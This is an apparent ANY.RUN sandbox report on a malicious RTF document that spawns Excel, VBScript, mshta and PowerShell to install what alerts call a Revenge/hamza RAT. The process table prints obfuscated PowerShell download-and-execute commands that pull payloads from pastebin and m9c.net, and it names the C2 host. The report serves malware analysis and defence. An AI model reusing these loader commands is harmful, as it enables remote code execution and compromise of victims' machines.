analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

f3c5d8c75e64ddea1c6e446899910c76

Full analysis: https://app.any.run/tasks/91cf4db7-3133-4176-b845-65467f5fffe3
Verdict: Malicious activity
Analysis date: July 18, 2019, 03:05:21
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

F3C5D8C75E64DDEA1C6E446899910C76

SHA1:

43EEAF9662FC56EEF8FDAD8E5C4745CD47D6E767

SHA256:

E053EF659D1F9988AA446EF54846A4783DB3C793BF86D94BE4673906C384502E

SSDEEP:

24576:gvWOvWAvWdvWDvWLvWGvWVvWnvWQvWbvW2vWFvWcvWcvWzvWEvWHvW5vW5vW6vWC:H

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 1768)
      • cmd.exe (PID: 3156)
      • cmd.exe (PID: 2780)
      • cmd.exe (PID: 3596)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2560)
    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 2560)
    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 3596)
    • Executes PowerShell scripts

      • mshta.exe (PID: 616)
    • Connects to CnC server

      • powershell.exe (PID: 2924)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3820)
  • SUSPICIOUS

    • Executed via COM

      • EXCEL.EXE (PID: 2560)
      • EXCEL.EXE (PID: 2652)
    • Executes scripts

      • cmd.exe (PID: 3156)
      • cmd.exe (PID: 1768)
    • Executes PowerShell scripts

      • WScript.exe (PID: 3452)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 3452)
    • Uses TASKKILL.EXE to kill Office Apps

      • cmd.exe (PID: 2288)
    • Creates files in the user directory

      • powershell.exe (PID: 3484)
      • powershell.exe (PID: 2924)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 2780)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3884)
      • EXCEL.EXE (PID: 2560)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3884)
      • EXCEL.EXE (PID: 2560)
      • EXCEL.EXE (PID: 2652)
    • Reads internet explorer settings

      • mshta.exe (PID: 616)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2924)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

Author: Karla
LastModifiedBy: Joselio Bonin
CreateDate: 2019:06:26 01:31:00
ModifyDate: 2019:06:26 01:37:00
RevisionNumber: 2
TotalEditTime: 3 minutes
Pages: 1
Words: 3
Characters: 18
CharactersWithSpaces: 20
InternalVersionNumber: 105
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
62
Monitored processes
20
Malicious processes
6
Suspicious processes
3

Behavior graph

Click at the process to see the details
start winword.exe no specs excel.exe cmd.exe no specs cmd.exe no specs ping.exe no specs ping.exe no specs wscript.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs cmd.exe no specs ping.exe no specs ping.exe no specs taskkill.exe no specs taskkill.exe no specs excel.exe no specs mshta.exe no specs powershell.exe schtasks.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3884"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\f3c5d8c75e64ddea1c6e446899910c76.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
1
Version:
14.0.6024.1000
2560"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXE
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
1
Version:
14.0.6024.1000
3156"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 6 > nul & start C:\Users\Public\OfficeWord.vbsC:\Windows\System32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1768"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 7 > nul & start C:\Users\Public\Microsoft.vbsC:\Windows\System32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2176ping 127.0.0.1 -n 6 C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1736ping 127.0.0.1 -n 7 C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4076"C:\Windows\System32\WScript.exe" "C:\Users\Public\OfficeWord.vbs" C:\Windows\System32\WScript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3452"C:\Windows\System32\WScript.exe" "C:\Users\Public\Microsoft.vbs" C:\Windows\System32\WScript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2780"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/'+'e8GrYbHb'))).EntryPoint.Invoke($N,$N)",0,true)(window.close)C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3484"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)'+ 'Net.'+'WebC'+'lient)'+'.Dow'+'nload'+'Str'+'ing(''http://www.m9c.net/uploads/15615146751.jpg'').replace(''*'',''x0'')'));[<##>AppDomain<##>]::<##>('^urrentDomain'.replace('^','C'))<##>.<##>('%oad'.replace('%','L'))($sc64).'EntryPoint'<##>.<##>('in@okg'.replace('g','e').replace('@','v'))($null,$null)C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 279
Read events
1 021
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
7
Text files
5
Unknown types
4

Dropped files

PID
Process
Filename
Type
3884WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRF81C.tmp.cvr
MD5:
SHA256:
2560EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR2A.tmp.cvr
MD5:
SHA256:
3484powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JX3EEC1XRVUNLBWUWTRF.temp
MD5:
SHA256:
2652EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR2527.tmp.cvr
MD5:
SHA256:
2924powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HP5SI8Y75Q06IOZCBERL.temp
MD5:
SHA256:
2560EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\yvyE642L[1].txttext
MD5:7F2A202549A7CE9E21FA866B234E6E1F
SHA256:81D128737CE4EC69BCAB76FFA039B80C84A1E8001DB603029DA878E766BD0E9D
2560EXCEL.EXEC:\Users\Public\OfficeWord.vbstext
MD5:7F2A202549A7CE9E21FA866B234E6E1F
SHA256:81D128737CE4EC69BCAB76FFA039B80C84A1E8001DB603029DA878E766BD0E9D
3484powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFe2362.TMPbinary
MD5:E4D9C442DD447A8FA05F9CFE88FCBB69
SHA256:EDD7D7597C6C79A1DFD3229A1FA23433329B1D8399EB558623FFF948D3BB4036
2560EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\qzduaLGZ[1].txttext
MD5:E6896FCD01487D21DFEF7326A34AFF8E
SHA256:45E45D2932816B14665F65EE4FC1AA7473B29031DA1612D3D909F867C618D80E
3884WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:9C8E9F7DA8C5639E962201B54893874F
SHA256:ED894FB76B582682A53A8210F617C702B4B53BCFE10ACB9FD7AA09B96BA06E53
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
39
DNS requests
6
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2924
powershell.exe
152.246.81.100:80
bylgay.hopto.org
TELEFÔNICA BRASIL S.A
BR
malicious
2924
powershell.exe
104.20.208.21:443
pastebin.com
Cloudflare Inc
US
shared
2560
EXCEL.EXE
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
pastebin.com
  • 104.20.209.21
  • 104.20.208.21
shared
bylgay.hopto.org
  • 152.246.81.100
malicious

Threats

PID
Process
Class
Message
2924
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin
2924
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin
2924
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin
2924
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin
2924
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin
2924
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin
2924
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin
2924
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin
2924
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin
2924
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin
No debug info